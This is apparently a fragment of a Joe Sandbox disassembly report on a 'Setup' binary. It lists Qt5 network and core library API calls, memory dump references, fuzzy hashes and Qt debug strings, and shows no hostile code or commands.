                                                                                                                                                              • ??0QString@@QEAA@XZ.QT5CORE(?,?,?,00000000,?,?,00007FFBA19F8255,?,?,?,00007FFBA1971D45), ref: 00007FFBA19F6D71
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,00000000,?,?,00007FFBA19F8255,?,?,?,00007FFBA1971D45), ref: 00007FFBA19F6DA7
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,00000000,?,?,00007FFBA19F8255,?,?,?,00007FFBA1971D45), ref: 00007FFBA19F6DBB
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,00000000,?,?,00007FFBA19F8255,?,?,?,00007FFBA1971D45), ref: 00007FFBA19F6DCC
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,00000000,?,?,00007FFBA19F8255,?,?,?,00007FFBA1971D45), ref: 00007FFBA19F6E06
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,00000000,?,?,00007FFBA19F8255,?,?,?,00007FFBA1971D45), ref: 00007FFBA19F6E10
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,00000000,?,?,00007FFBA19F8255,?,?,?,00007FFBA1971D45), ref: 00007FFBA19F6E1A
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Data@@Hash$Array@@ByteV0@@$?detach_helper@?free_helper@Node@1@Node@1@@$BasicTimer@@malloc
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3171273871-0
                                                                                                                                                              • Opcode ID: df477cb790d8c12ad5df72f093be0e024e7f27c432e4ceff40af62d262b93393
                                                                                                                                                              • Instruction ID: c139c8c951637ec1572d01ba46b88229ddc73bf229e39ef3870eab19f16cb198
                                                                                                                                                              • Opcode Fuzzy Hash: df477cb790d8c12ad5df72f093be0e024e7f27c432e4ceff40af62d262b93393
                                                                                                                                                              • Instruction Fuzzy Hash: 6341C2B2A0AA4296EB82CF35D84417833A1FB44B68F444136DF1E47694EF3CE55ACF00
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?begin@$memmove$?append@?detach_grow@?dispose@?end@?lock@Data@1@Data@1@@Locker@@MutexMutex@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3273657621-0
                                                                                                                                                              • Opcode ID: 1286bc6bfe0c6da8d4422549c6b866b9e9a34cace0f9d59130ace275fcfcc975
                                                                                                                                                              • Instruction ID: 4d6617fa6544e0fe62122ab98a46439da90bb17cf78e0dee155a12220fda1537
                                                                                                                                                              • Opcode Fuzzy Hash: 1286bc6bfe0c6da8d4422549c6b866b9e9a34cace0f9d59130ace275fcfcc975
                                                                                                                                                              • Instruction Fuzzy Hash: FC417C76A0AA4282EB929F21E8541B87365FF84BE4F854132DD5E477A4EF7CE449CB00
                                                                                                                                                              APIs
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,?,00000000,?,?,00007FFBA1971BD5), ref: 00007FFBA1972812
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,?,00000000,?,?,00007FFBA1971BD5), ref: 00007FFBA197284F
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,?,00000000,?,?,00007FFBA1971BD5), ref: 00007FFBA197285E
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,?,00000000,?,?,00007FFBA1971BD5), ref: 00007FFBA197286D
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,?,00000000,?,?,00007FFBA1971BD5), ref: 00007FFBA19728AB
                                                                                                                                                              • memmove.VCRUNTIME140(?,?,?,?,00000000,?,?,00007FFBA1971BD5), ref: 00007FFBA19728D9
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,?,00000000,?,?,00007FFBA1971BD5), ref: 00007FFBA19728EF
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,?,00000000,?,?,00007FFBA1971BD5), ref: 00007FFBA19728FE
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,?,?,?,00000000,?,?,00007FFBA1971BD5), ref: 00007FFBA197290D
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,00000000,?,?,00007FFBA1971BD5), ref: 00007FFBA1972927
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,00000000,?,?,00007FFBA1971BD5), ref: 00007FFBA1972932
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,00000000,?,?,00007FFBA1971BD5), ref: 00007FFBA197293D
                                                                                                                                                              • ?data@QArrayData@@QEBAPEBXXZ.QT5CORE(?,?,?,?,00000000,?,?,00007FFBA1971BD5), ref: 00007FFBA197294B
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Array@@ByteV0@@$?data@ArrayData@@String@@$memmove
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4187826100-0
                                                                                                                                                              • Opcode ID: 022488380ec874e201addea0da0b257d8b313069e6283001033adb08d12289e2
                                                                                                                                                              • Instruction ID: cbdc431372851f348b2f51497552858728a7098ab2c5eafba552fc4d8a248fad
                                                                                                                                                              • Opcode Fuzzy Hash: 022488380ec874e201addea0da0b257d8b313069e6283001033adb08d12289e2
                                                                                                                                                              • Instruction Fuzzy Hash: E6417CB2719A4682DF51DF25E5944BDB3A1FB84B98B448022DE9E07768EF3CD54ACB00
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • QNetworkAccessCache::releaseEntry: trying to release key '%s' that is not in cache, xrefs: 00007FFBA197C0D7
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Date$Time@@$Array@@ByteData@@HashHash@@Logger@@Message$?add?current?data@?detach_helper@?free_helper@?warning@Char@@Node@1@Node@1@@Secs@String@@TimeUtc@V0@$$V0@@V1@_
                                                                                                                                                              • String ID: QNetworkAccessCache::releaseEntry: trying to release key '%s' that is not in cache
                                                                                                                                                              • API String ID: 3083673391-687977604
                                                                                                                                                              • Opcode ID: 3064fc972378619a1b881fcc307f6dabe4d00f0c57cc274534df81d690ab70b8
                                                                                                                                                              • Instruction ID: 4f3e6e5d43b9cb048561963ceb6dac6ebb2e532cdb05c9e0ef9e548e54ef1b95
                                                                                                                                                              • Opcode Fuzzy Hash: 3064fc972378619a1b881fcc307f6dabe4d00f0c57cc274534df81d690ab70b8
                                                                                                                                                              • Instruction Fuzzy Hash: D7B178B2B0AB4686EBA2DF25E44427973A4FF84B98F854431CE5D47754EF38E842CB50
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • QNetworkReplyImpl: network cache returned a device that is not open -- class %s probably needs to be fixed, xrefs: 00007FFBA198B6DB
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Variant@@$Device@@Logger@@MessageOpen@$?class?critical@?free_helper@Data@@HashInt@MetaName@Node@1@@Object@@V0@@Valid@
                                                                                                                                                              • String ID: QNetworkReplyImpl: network cache returned a device that is not open -- class %s probably needs to be fixed
                                                                                                                                                              • API String ID: 537839420-1703945251
                                                                                                                                                              • Opcode ID: 470897026170c8b8f2abf86fe467e55f5b5c12b58f52eef17cf3987f94b3d20b
                                                                                                                                                              • Instruction ID: 324e535c9f31e54e7755986421e21a19744b526242a32ee21cdeacdce0d80210
                                                                                                                                                              • Opcode Fuzzy Hash: 470897026170c8b8f2abf86fe467e55f5b5c12b58f52eef17cf3987f94b3d20b
                                                                                                                                                              • Instruction Fuzzy Hash: 0A514CA2A0AA5295EF85DF75D4546EC2360FF44BACF944032EE1E476A5EF38D44ACB00
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              • QNetworkReplyImpl: backend error: caching was enabled after some bytes had been written, xrefs: 00007FFBA198C3A8
                                                                                                                                                              • QNetworkReplyImpl: setCachingEnabled(true) called after setCachingEnabled(false) -- backend %s probably needs to be fixed, xrefs: 00007FFBA198C32A
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Variant@@$Logger@@Message$?class?critical@?debug@Bool@MetaName@Object@@V0@@
                                                                                                                                                              • String ID: QNetworkReplyImpl: backend error: caching was enabled after some bytes had been written$QNetworkReplyImpl: setCachingEnabled(true) called after setCachingEnabled(false) -- backend %s probably needs to be fixed
                                                                                                                                                              • API String ID: 3810139445-743246420
                                                                                                                                                              • Opcode ID: 78e568f9dc70c4b86bb5629bbc274a5ad8864013b5f4cdebbdd9e79dc4f0c29d
                                                                                                                                                              • Instruction ID: 74ba93a33f3767d7b635cf9bf29c99cd554ffd857b23fa2ed675f1f6b8346c42
                                                                                                                                                              • Opcode Fuzzy Hash: 78e568f9dc70c4b86bb5629bbc274a5ad8864013b5f4cdebbdd9e79dc4f0c29d
                                                                                                                                                              • Instruction Fuzzy Hash: 20414272A0E64282EB928B39E4542B96361FF95BD8F544032DE9E07665DF3CE546CF00
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA1A55CBC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBA19730E8), ref: 00007FFBA1A55CD6
                                                                                                                                                              • ??0QObjectPrivate@@QEAA@H@Z.QT5CORE(?,?,?,?,?,?,?,?,00000004,00007FFBA19731B1), ref: 00007FFBA19FF49D
                                                                                                                                                              • CoInitialize.OLE32(?,?,?,?,?,?,?,?,00000004,00007FFBA19731B1), ref: 00007FFBA19FF4BC
                                                                                                                                                              • ?isWarningEnabled@QLoggingCategory@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,00000004,00007FFBA19731B1), ref: 00007FFBA19FF4D4
                                                                                                                                                                • Part of subcall function 00007FFBA1A00560: ??0QLoggingCategory@@QEAA@PEBD@Z.QT5CORE(?,?,00000000,00007FFBA19FF3B2,?,?,?,?,?,?,00000000,00000000,00000000,00007FFBA19FF569), ref: 00007FFBA1A005BC
                                                                                                                                                                • Part of subcall function 00007FFBA1A00560: _Init_thread_footer.LIBCMT ref: 00007FFBA1A005D5
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH00@Z.QT5CORE(?,?,?,?,?,?,?,?,00000004,00007FFBA19731B1), ref: 00007FFBA19FF4F9
                                                                                                                                                              • ?warning@QMessageLogger@@QEBA?AVQDebug@@XZ.QT5CORE(?,?,?,?,?,?,?,?,00000004,00007FFBA19731B1), ref: 00007FFBA19FF507
                                                                                                                                                              • ??6QDebug@@QEAAAEAV0@PEBD@Z.QT5CORE(?,?,?,?,?,?,?,?,00000004,00007FFBA19731B1), ref: 00007FFBA19FF517
                                                                                                                                                                • Part of subcall function 00007FFBA19FFB00: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00007FFBA19FF413), ref: 00007FFBA19FFB4B
                                                                                                                                                                • Part of subcall function 00007FFBA19FFB00: ?fromWCharArray@QString@@SA?AV1@PEB_WH@Z.QT5CORE(?,?,?,?,?,?,?,?,?,?,00000000,00007FFBA19FF413), ref: 00007FFBA19FFC07
                                                                                                                                                                • Part of subcall function 00007FFBA19FFB00: LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00007FFBA19FF413), ref: 00007FFBA19FFC2C
                                                                                                                                                              • ??6QDebug@@QEAAAEAV0@AEBVQString@@@Z.QT5CORE(?,?,?,?,?,?,?,?,00000004,00007FFBA19731B1), ref: 00007FFBA19FF532
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,00000004,00007FFBA19731B1), ref: 00007FFBA19FF53D
                                                                                                                                                              • ??1QDebug@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,00000004,00007FFBA19731B1), ref: 00007FFBA19FF548
                                                                                                                                                              • ??0QObject@@IEAA@AEAVQObjectPrivate@@PEAV0@@Z.QT5CORE(?,?,?,?,?,?,?,?,00000004,00007FFBA19731B1), ref: 00007FFBA19FF59F
                                                                                                                                                              Strings
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Debug@@$Message$Category@@Logger@@LoggingObjectPrivate@@String@@$?from?warning@Array@CharEnabled@FormatFreeH00@Init_thread_footerInitializeLocalObject@@String@@@V0@@Warningmalloc
                                                                                                                                                              • String ID: Failed to initialize COM:
                                                                                                                                                              • API String ID: 2351763995-2399992133
                                                                                                                                                              • Opcode ID: 25ebf824219e0f63c29a817e97e85afd5770fbd8804ec85f43151cd68469fc99
                                                                                                                                                              • Instruction ID: 8224ecf109b6e34fee762d7c6369080971cd00b4f8a5ddd5a7f7d2a082c09feb
                                                                                                                                                              • Opcode Fuzzy Hash: 25ebf824219e0f63c29a817e97e85afd5770fbd8804ec85f43151cd68469fc99
                                                                                                                                                              • Instruction Fuzzy Hash: 063183A2A0AB4292EB85DB76E41417973A1FF88BD4F004036DE5E47761EF3CD459CB00
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Lower@$??8@?host@?machineComponentFlags@FormattingHostInfo@@Latin1Name@Option@String@@0@String@@@Url@@Url@@@@@
                                                                                                                                                              • String ID: localhost
                                                                                                                                                              • API String ID: 1423102908-2663516195
                                                                                                                                                              • Opcode ID: 64ad9057d1978c070556d6b1cdca8d8063233c76ef94d4645756658d89ca9ee9
                                                                                                                                                              • Instruction ID: 8a56146c505839835a01551882de44835e4bde426a14cd2adde6fb588644f241
                                                                                                                                                              • Opcode Fuzzy Hash: 64ad9057d1978c070556d6b1cdca8d8063233c76ef94d4645756658d89ca9ee9
                                                                                                                                                              • Instruction Fuzzy Hash: 153188E161D74292EB82DB24E4442B9B361FF80795F441031ED8E466A5EF6CE649CF00
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QEventLoop@@QEAA@PEAVQObject@@@Z.QT5CORE ref: 00007FFBA19DF3DA
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA19DF409
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA19DF414
                                                                                                                                                              • ?connect@QObject@@SA?AVConnection@QMetaObject@@PEBV1@PEBD01W4ConnectionType@Qt@@@Z.QT5CORE ref: 00007FFBA19DF43B
                                                                                                                                                              • ??1Connection@QMetaObject@@QEAA@XZ.QT5CORE ref: 00007FFBA19DF446
                                                                                                                                                              • ?singleShot@QTimer@@SAXHPEBVQObject@@PEBD@Z.QT5CORE ref: 00007FFBA19DF45A
                                                                                                                                                              • ?exec@QEventLoop@@QEAAHV?$QFlags@W4ProcessEventsFlag@QEventLoop@@@@@Z.QT5CORE ref: 00007FFBA19DF46A
                                                                                                                                                              • ??1QEventLoop@@UEAA@XZ.QT5CORE ref: 00007FFBA19DF47D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Object@@$Connection@EventMeta$Loop@@$?connect@ConnectionQt@@@Type@$?exec@?singleEventsFlag@Flags@Loop@@@@@Object@@@ProcessShot@Timer@@
                                                                                                                                                              • String ID: 1quit()$2error(QNetworkSession::SessionError)$2quitPendingWaitsForOpened()
                                                                                                                                                              • API String ID: 3160854680-1977835684
                                                                                                                                                              • Opcode ID: 0f515768b20db7d698d8c104e7d155a5faa5a2e34da404367f375e6537d2eb37
                                                                                                                                                              • Instruction ID: 04d8b77e09c3bdd93f4f8814dc36bf45dcdf12482e21648c10ea59bc1db9f0ce
                                                                                                                                                              • Opcode Fuzzy Hash: 0f515768b20db7d698d8c104e7d155a5faa5a2e34da404367f375e6537d2eb37
                                                                                                                                                              • Instruction Fuzzy Hash: 65313EB261DA4582DB81CF26F4441AEB761FB84BA4F484032EE9D47668EF3CD545CF00
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QBasicTimer@@QEAA@XZ.QT5CORE(?,?,00000000,00007FFBA19C898A,?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C49BE
                                                                                                                                                              • ??0QMutex@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C49C8
                                                                                                                                                              • ??4QUrl@@QEAAAEAV0@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C49E1
                                                                                                                                                              • ?detach@QListData@@QEAAPEAUData@1@H@Z.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C4A38
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C4A42
                                                                                                                                                              • ?end@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C4A50
                                                                                                                                                              • ?begin@QListData@@QEBAPEAPEAXXZ.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C4A5E
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C4A87
                                                                                                                                                              • ??0QByteArray@@QEAA@AEBV0@@Z.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C4A95
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C4B11
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C4B1A
                                                                                                                                                              • ?dispose@QListData@@SAXPEAUData@1@@Z.QT5CORE(?,00000000,00000000,00007FFBA19C9711,?,?,?,00007FFBA19D4F86), ref: 00007FFBA19C4B35
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$Array@@Byte$V0@@$?begin@$?detach@?dispose@?end@BasicData@1@Data@1@@Mutex@@Timer@@Url@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3810802383-0
                                                                                                                                                              • Opcode ID: f88c4e86a7a6addd8696299603cf2e32692ebed0d560fdb07d268aedcfe54d68
                                                                                                                                                              • Instruction ID: c700fa49b32a869fe6444df6e479d2e891379f5184560d0ba62175eedf6bbc26
                                                                                                                                                              • Opcode Fuzzy Hash: f88c4e86a7a6addd8696299603cf2e32692ebed0d560fdb07d268aedcfe54d68
                                                                                                                                                              • Instruction Fuzzy Hash: 9B418E72B0AA4286EB558F25E84417D7360FB85BA5B444132DF6E47B94EF3CE856CF00
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Variant@@$ElapsedLongLong@Timer@@V0@@$?elapsed@?ready?restart@Device@@Null@Read@V0@$$
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 486414557-0
                                                                                                                                                              • Opcode ID: db79ca0deba5025a4a9234812b8810621c4d7ff65247698bdbadcc7f008856ce
                                                                                                                                                              • Instruction ID: e17f54c0457b17a6928ac5c178a1c71350cda4ba6bd3b40905f21f4f717c9dda
                                                                                                                                                              • Opcode Fuzzy Hash: db79ca0deba5025a4a9234812b8810621c4d7ff65247698bdbadcc7f008856ce
                                                                                                                                                              • Instruction Fuzzy Hash: 9D4174B2A1EA4281EF95CB35D4541B96361FF44BA8F488132DE5E076E8DF3CE446CB10
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$?size@Array@@Byte$?data@Char@@Data@@Hash$?free?hasDateHash@@Node@Shrunk@Time@@memcmp
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3260407355-0
                                                                                                                                                              • Opcode ID: d80fd227786739f18c52c6fe6889b916e03d0b4eab8747d65d94ace93eb76240
                                                                                                                                                              • Instruction ID: bfbd5f1e722d91a551c73cccda13de29bdd4c1c60fe855cb8eb53fd7042205e8
                                                                                                                                                              • Opcode Fuzzy Hash: d80fd227786739f18c52c6fe6889b916e03d0b4eab8747d65d94ace93eb76240
                                                                                                                                                              • Instruction Fuzzy Hash: 05412BB6A09A4686DB91DB32E90406E77A1FF88FD8B844032DE5E47764EF3CD446CB10
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00007FFBA197BE20: ?detach_helper@QHashData@@QEAAPEAU1@P6AXPEAUNode@1@PEAX@ZP6AX0@ZHH@Z.QT5CORE ref: 00007FFBA197BE58
                                                                                                                                                                • Part of subcall function 00007FFBA197BE20: ?free_helper@QHashData@@QEAAXP6AXPEAUNode@1@@Z@Z.QT5CORE ref: 00007FFBA197BE8B
                                                                                                                                                              • ?qHash@@YAIAEBVQByteArray@@I@Z.QT5CORE ref: 00007FFBA197C5D8
                                                                                                                                                                • Part of subcall function 00007FFBA197CAF0: ?qHash@@YAIAEBVQByteArray@@I@Z.QT5CORE(?,?,?,00007FFBA197B899), ref: 00007FFBA197CB21
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH0@Z.QT5CORE ref: 00007FFBA197C609
                                                                                                                                                              • ?data@QString@@QEBAPEBVQChar@@XZ.QT5CORE ref: 00007FFBA197C615
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE ref: 00007FFBA197C628
                                                                                                                                                              • ??0QMessageLogger@@QEAA@PEBDH0@Z.QT5CORE ref: 00007FFBA197C65A
                                                                                                                                                              • ?data@QString@@QEBAPEBVQChar@@XZ.QT5CORE ref: 00007FFBA197C666
                                                                                                                                                              • ?warning@QMessageLogger@@QEBAXPEBDZZ.QT5CORE ref: 00007FFBA197C679
                                                                                                                                                              • ?clear@QByteArray@@QEAAXXZ.QT5CORE ref: 00007FFBA197C687
                                                                                                                                                                • Part of subcall function 00007FFBA197CBD0: ?stop@QBasicTimer@@QEAAXXZ.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CBE1
                                                                                                                                                                • Part of subcall function 00007FFBA197CBD0: ?currentDateTimeUtc@QDateTime@@SA?AV1@XZ.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CBF8
                                                                                                                                                                • Part of subcall function 00007FFBA197CBD0: ?secsTo@QDateTime@@QEBA_JAEBV1@@Z.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CC05
                                                                                                                                                                • Part of subcall function 00007FFBA197CBD0: ??1QDateTime@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CC13
                                                                                                                                                                • Part of subcall function 00007FFBA197CBD0: ?start@QBasicTimer@@QEAAXHPEAVQObject@@@Z.QT5CORE(?,?,?,00007FFBA197B8A5), ref: 00007FFBA197CC34
                                                                                                                                                              Strings
                                                                                                                                                              • QNetworkAccessCache::removeEntry: trying to remove key '%s' that is not in cache, xrefs: 00007FFBA197C61B
                                                                                                                                                              • QNetworkAccessCache::removeEntry: removing active cache entry '%s', xrefs: 00007FFBA197C66C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmp
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: DateLogger@@Message$Array@@ByteTime@@$?data@?warning@BasicChar@@Data@@HashHash@@String@@Timer@@$?clear@?current?detach_helper@?free_helper@?secs?start@?stop@Node@1@Node@1@@Object@@@TimeUtc@V1@@
                                                                                                                                                              • String ID: QNetworkAccessCache::removeEntry: removing active cache entry '%s'$QNetworkAccessCache::removeEntry: trying to remove key '%s' that is not in cache
                                                                                                                                                              • API String ID: 2986720860-2766300203
                                                                                                                                                              • Opcode ID: bd9a608a38b2827ebd807e598d12f6d6b4d5e0fab2ada34008ecb8b5120cf81a
                                                                                                                                                              • Instruction ID: 2ee638e3e6831b7a7c2fbf382b7d76c90b6be065da5cff544c854253e44adc81
                                                                                                                                                              • Opcode Fuzzy Hash: bd9a608a38b2827ebd807e598d12f6d6b4d5e0fab2ada34008ecb8b5120cf81a
                                                                                                                                                              • Instruction Fuzzy Hash: 54218DA6A0D65382EB95EB36E5541796362EF89FD8B844032DE0E07B55DE3CE006CF00
                                                                                                                                                              APIs
                                                                                                                                                              • ??0QDebugStateSaver@@QEAA@AEAVQDebug@@@Z.QT5CORE ref: 00007FFBA19804DA
                                                                                                                                                              • ?resetFormat@QDebug@@QEAAAEAV1@XZ.QT5CORE ref: 00007FFBA19804E3
                                                                                                                                                              • ??6QDebug@@QEAAAEAV0@PEBD@Z.QT5CORE ref: 00007FFBA19804FB
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ??0QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1980517), ref: 00007FFBA1982A2C
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ?isEmpty@QString@@QEBA_NXZ.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1980517), ref: 00007FFBA1982A39
                                                                                                                                                                • Part of subcall function 00007FFBA1982A10: ??4QByteArray@@QEAAAEAV0@AEBV0@@Z.QT5CORE(?,?,?,?,?,?,?,?,?,00007FFBA1980517), ref: 00007FFBA1982A52
